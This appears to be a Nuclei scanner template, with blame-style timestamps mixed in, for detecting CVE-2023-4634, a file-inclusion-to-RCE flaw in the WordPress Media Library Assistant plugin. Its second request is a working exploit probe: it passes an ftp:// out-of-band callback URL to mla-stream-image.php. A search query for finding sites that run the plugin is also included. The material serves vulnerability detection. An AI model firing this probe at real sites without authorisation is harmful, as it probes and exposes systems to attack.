2023-09-05 13:30:09 +00:00
id : CVE-2023-4634
info :
name : Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
author : Pepitoh,ritikchaddha
severity : critical
description : |
2023-09-05 13:33:32 +00:00
A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
2023-09-05 13:30:09 +00:00
remediation : Fixed in version 3.09
reference :
- https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
2023-09-05 13:32:19 +00:00
- https://fr.wordpress.org/plugins/media-library-assistant/advanced/
2023-09-05 13:30:09 +00:00
- https://cve.report/CVE-2023-4634
classification :
cve-id : CVE-2023-4634
metadata :
verified : true
2023-09-06 11:43:37 +00:00
max-request : 2
2023-09-05 13:30:09 +00:00
publicwww-query : "wp-content/plugins/media-library-assistant"
2023-09-05 13:32:19 +00:00
tags : cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant
2023-09-05 13:30:09 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt"
- "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"
matchers-condition : and
matchers :
- type : word
part : body_1
words :
- "Media Library Assistant"
- type : word
part : interactsh_protocol
words :
- "dns"